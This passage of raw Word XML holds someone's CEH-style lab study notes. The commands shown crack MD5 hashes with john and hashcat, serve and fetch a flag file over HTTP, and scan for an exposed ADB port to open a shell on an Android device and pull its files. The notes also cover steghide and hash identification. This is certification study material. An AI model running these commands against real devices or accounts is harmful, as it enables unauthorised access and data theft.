    <w:p w:rsidR="417DD57D" w:rsidP="40100644" w:rsidRDefault="417DD57D" w14:paraId="532E61EA" w14:textId="33AC0B54">
      <w:pPr>
        <w:pStyle w:val="Normal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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="417DD57D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GB"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1AF8FD88" w:rsidP="40100644" w:rsidRDefault="1AF8FD88" w14:paraId="601A0ADC" w14:textId="5D960185">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="40100644" w:rsidR="1AF8FD88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GB"/>
        </w:rPr>
        <w:t>-&gt; https://ceh-practical.cavementech.com/module-7.-malware-threats/1.-gain-access-to-systems-with-trojans</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="186FDBE6" w:rsidP="40100644" w:rsidRDefault="186FDBE6" w14:paraId="2AEE9C4E" w14:textId="4AD4DCD0">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="186FDBE6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GB"/>
        </w:rPr>
        <w:t>Cryptography:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3F16C172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GB"/>
        </w:rPr>
        <w:t>-&gt; john --format=Raw-MD5 --wordlist=rockyou.txt Hash2crack.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="69D8BF9D" w:rsidP="7D333612" w:rsidRDefault="69D8BF9D" w14:paraId="567C292A" w14:textId="275DECCA">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="69D8BF9D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GB"/>
        </w:rPr>
        <w:t>Python server:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="442F51B2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GB"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="353387C7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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">in windows folder where the flag fileis: </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="442F51B2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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> python -m </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="442F51B2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GB"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="442F51B2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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8000</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="28FC228E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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28FC228E" w:rsidP="7D333612" w:rsidRDefault="28FC228E" w14:paraId="76F1AC76" w14:textId="19D61A05">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="28FC228E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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; from parrot: wget </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="28FC228E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GB"/>
        </w:rPr>
        <w:t>http://192.168.200.95:8000/pythonserver.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="7E6E544E" w14:textId="53A37B7B">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="39C00F90" w:rsidP="7D333612" w:rsidRDefault="39C00F90" w14:paraId="757F20FE" w14:textId="779106B1">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="39C00F90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GB"/>
        </w:rPr>
        <w:t>Mobile:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="53424560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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="53424560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GB"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="53424560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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 80,443,8080,8443,5228,5555 --open 10.10.55.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53424560" w:rsidP="7D333612" w:rsidRDefault="53424560" w14:paraId="102D20C9" w14:textId="3AE80CA9">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="53424560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GB"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> adb connect x.x.x.x:5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E3883FA" w:rsidP="7D333612" w:rsidRDefault="5E3883FA" w14:paraId="6A799842" w14:textId="6E9276B7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t>-&gt; adb devices -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E3883FA" w:rsidP="7D333612" w:rsidRDefault="5E3883FA" w14:paraId="65E2996D" w14:textId="3CF9E253">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; adb shell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E3883FA" w:rsidP="7D333612" w:rsidRDefault="5E3883FA" w14:paraId="7F6E07AA" w14:textId="21A45B6C">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t>-&gt; pwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E3883FA" w:rsidP="7D333612" w:rsidRDefault="5E3883FA" w14:paraId="2DBA1F3B" w14:textId="18A5D301">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; ls -&gt;cd Download-&gt;ls-&gt;cd </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t>sdcard</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> (search for files)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E3883FA" w:rsidP="7D333612" w:rsidRDefault="5E3883FA" w14:paraId="6D386E9C" w14:textId="100182A6">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t>adb</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell "find /</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t>sdcard</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t>/Scan -type f -name 'TestFile'"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E3883FA" w:rsidP="7D333612" w:rsidRDefault="5E3883FA" w14:paraId="2F18D205" w14:textId="7D5893A6">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t>or ,</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t>adb</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell find /</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t>sdcard</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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GB"/>
        </w:rPr>
        <w:t>/ -name "</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.jpg" -o -name "</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA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" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E3883FA" w:rsidP="7D333612" w:rsidRDefault="5E3883FA" w14:paraId="70601F03" w14:textId="5951AEEB">
      <w:pPr>
        <w:pStyle w:val="Normal"/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GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-&gt;adb pull /</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sdcard</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="5E3883FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/Downloads/CEH.jpg ./ceh.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4B849A98" w:rsidP="7D333612" w:rsidRDefault="4B849A98" w14:paraId="39E6642E" w14:textId="2DF3E9A2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="4B849A98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-&gt; Calculate entropy value: </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="4B849A98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="4B849A98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7D333612" w:rsidR="4B849A98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>test.elf</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="4B849A98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(update &amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="4B849A98">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="4B849A98">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="4B849A98">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="4B849A98">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4B849A98" w:rsidP="7D333612" w:rsidRDefault="4B849A98" w14:paraId="2C3D4CB2" w14:textId="0C5517B4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="4B849A98">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1F2328"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="4B849A98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> sha384sum </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="4B849A98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>test.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="74D9F5ED" w:rsidP="7D333612" w:rsidRDefault="74D9F5ED" w14:paraId="266BE18E" w14:textId="7F9C3FC9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="74D9F5ED">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="74D9F5ED">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>steghide</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="74D9F5ED">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> extract -sf island.jpg or use </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="74D9F5ED">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>openstego</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="74D9F5ED">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">(no pass </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="74D9F5ED">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>required</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="74D9F5ED">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="41B498D5" w14:textId="766981E1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3D2E5BEA" w:rsidP="7D333612" w:rsidRDefault="3D2E5BEA" w14:paraId="39F4E577" w14:textId="2DC56F36">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2E5BEA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Veracrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2E5BEA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="62C68DDC" w:rsidP="7D333612" w:rsidRDefault="62C68DDC" w14:paraId="6159656C" w14:textId="2E4FBC08">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="62C68DDC">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="62C68DDC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hash-identifier b0b9d4d024430f1422ebdf433dea8afe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3D2E5BEA" w:rsidP="7D333612" w:rsidRDefault="3D2E5BEA" w14:paraId="485D5B3A" w14:textId="2F8EC3E2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="3D2E5BEA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="1821564E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>https://crackstation.net/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1821564E" w:rsidP="7D333612" w:rsidRDefault="1821564E" w14:paraId="45F89C89" w14:textId="073C753D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="1821564E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="R9822392dfc5b48e9">
        <w:r w:rsidRPr="7D333612" w:rsidR="1821564E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.tunnelsup.com/hash-analyzer/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="317F918A" w:rsidP="7D333612" w:rsidRDefault="317F918A" w14:paraId="6991B02A" w14:textId="4CC3D3A7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="317F918A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-&gt; hashcat –m 0 hashes.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="317F918A" w:rsidP="7D333612" w:rsidRDefault="317F918A" w14:paraId="7142771E" w14:textId="1EDE153B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
